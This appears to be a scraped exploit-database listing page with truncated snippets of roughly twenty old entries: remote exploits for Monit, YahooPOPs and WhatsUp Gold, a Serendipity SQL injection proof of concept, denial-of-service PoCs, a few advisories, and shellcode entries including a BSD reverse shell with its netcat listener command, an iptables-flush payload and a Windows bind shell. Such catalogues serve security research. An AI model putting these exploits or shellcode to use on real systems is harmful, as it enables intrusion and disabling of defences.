Monit 4.2 - Basic Authentication Remote Code Execution

Monit 4.2 - Basic Authentication Remote Code Execution / THE EYE ON SECURITY RESEARCH GROUP - INDIA http://www.eos-india.net/poc/305monit.c Remote Root Exploit for Monit linuxmailorg - Abhisek Datta abhisekfrontru 06.04.2004 http://www.eos-india.net New Targets : RedHat 9 Fedora Core 2 Slackware...

ProFTPd 1.2.10 - Remote Users Enumeration

/ Details Vulnerable Systems: ProFTPD Version 1.2.10 and below It is possible to determine which user names are valid, which are special, and which ones do not exist on the remote system. This can be accomplished by code execution path timing analysis attack at the ProFTPd login procedure. There ...

YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ================================================== YahooPOPs = 1.6 SMTP Port Buffer Overflow Exploit ================================================== / YahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1 Exploit code by class1...

YahooPOPs 1.6 - SMTP Port Buffer Overflow

/ YahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1 Exploit code by class101 at DFind.kd-team.com Bind a shellcode to the port 101. Thanx to Behrang [email protected] for the bug discovery Thanx to HDMoore and Metasploit.com for their kickass ASM work Instead of to move...

Microsoft Internet Explorer Install Engine contains a buffer overflow vulnerability

Overview The Active Setup Install Engine in Microsoft Internet Explorer contains a buffer overflow vulnerability. This may allow an attacker to take complete control of a vulnerable system. Description The Active Setup Install Engine inseng.dll permits cabinet files to be launched and executed...

Monolith Games Local Buffer Overflow Exploit

Exploit for unknown platform in category dos / poc ============================================ Monolith Games Local Buffer Overflow Exploit ============================================ / by Luigi Auriemma / include include include include ifdef WIN32 include include "winerr.h" define close...

IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ========================================================= IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit ========================================================= !/usr/bin/perl LoWNOISE NotmuchG.pl v.1.5...

IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl LoWNOISE NotmuchG.pl v.1.5 ================================================ IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit ================================================ Exploit by ET LoWNOISE Colombia etatcyberspace.org Oct/2004...

Debian DSA-184-1 : krb4 - buffer overflow

Tom Yu and Sam Hartman of MIT discovered another stack-based buffer overflow in the kadmserwrapin function in the Kerberos v4 administration server. This kadmind bug has a working exploit code circulating, hence it is considered serious. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The...

Serendipity 0.7-beta1 SQL Injection Proof of Concept

No description provided by source. Proof of Concept 1 ------------------ Usage: ./sersqlipoc.sh URLtoSerendipityWeblog sersqlipoc.sh ---------8-----------8------------- !/bin/sh echo -n "Username: " curl -I -s...

Microsoft SQL Server 7.0 - Remote Denial of Service (2)

// source: https://www.securityfocus.com/bid/11265/info Reportedly Microsoft SQL Server is affected by a remote denial of service vulnerability. This issue is due to a failure of the application to handle irregular network communications. An attacker may leverage this issue to cause the affected...

MyServer 0.7.1 (POST) Denial Of Service Exploit

Exploit for linux platform in category dos / poc =============================================== MyServer 0.7.1 POST Denial Of Service Exploit =============================================== // PoC to crash the server // / MyServer 0.7.1 POST Denial Of Service vendor URL:...

MyServer 0.7.1 - &#039;POST&#039; Denial of Service

// PoC to crash the server // / MyServer 0.7.1 POST Denial Of Service vendor URL: http://www.myserverproject.net coded and discovered by: badpack3t for .:sp research labs:. www.security-protocols.com 9.20.2004 Tested on Mandrake 10.0 usage: sp-myserv-0.7.1 targetport default is 80 / include inclu...

linux/x86 eject /dev/cdrom 64 bytes

Exploit for linux/x86 platform in category shellcode =================================== linux/x86 eject /dev/cdrom 64 bytes =================================== / CDROM EJECTING CODE by lamagra .data .globl main .type main,@function start: setreuid 0, 0 xorl %eax,%eax xorl %ebx,%ebx xorl %ecx,%ec...

freebsd/x86 execve /bin/sh 37 bytes

Exploit for freebsd/x86 platform in category shellcode =================================== freebsd/x86 execve /bin/sh 37 bytes =================================== / This is FreeBSD execve code.It is 37 bytes long.I'll try to make it smaller.Till then use this one. signed predator...

bsd/x86 - reverse portbind 129 bytes

bsd/x86 reverse portbind 129 bytes. Shellcode exploit for bsdx86 platform / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on 6969/tcp / / [email protected] / char shellcode = 0x31,0xc9,0x51,0x41,...

linux/x86 - iptables -F 58 bytes

linux/x86 iptables -F 58 bytes. Shellcode exploit for linx86 platform / The shellcode flushs the iptables by running /sbin/iptables -F no exit greetz to zilion: man, my code is shorter! size = 58 bytes OS = Linux i386 written by /rootteam/dev0id www.sysworld.net BITS 32 jmp short callme main: pop...

windows/XP-sp1 portshell on port 58821 116 bytes

windows/XP-sp1 portshell on port 58821 116 bytes. Shellcode exploit for win32 platform / 116 bytes bindcode hardcoded for Windows XP SP1 / / but you can change the address if you want / / i made it pretty clear where they are / / the bindcode will bind to port 58821 / / by silicon /...

linux/x86 xterm -ut -display [IP]:0 132 bytes

Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 xterm -ut -display IP:0 132 bytes ============================================= / Linux/x86 execve of /usr/X11R6/bin/xterm -ut -display ip:0, exit 127.0.0.1 is an example, you must change ...

os-x/PPC create /tmp/suid 122 bytes

Exploit for os-x/ppc platform in category shellcode =================================== os-x/PPC create /tmp/suid 122 bytes =================================== / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does open; write; close; exit; See ASM below. 122 Bytes. / char shellcode =...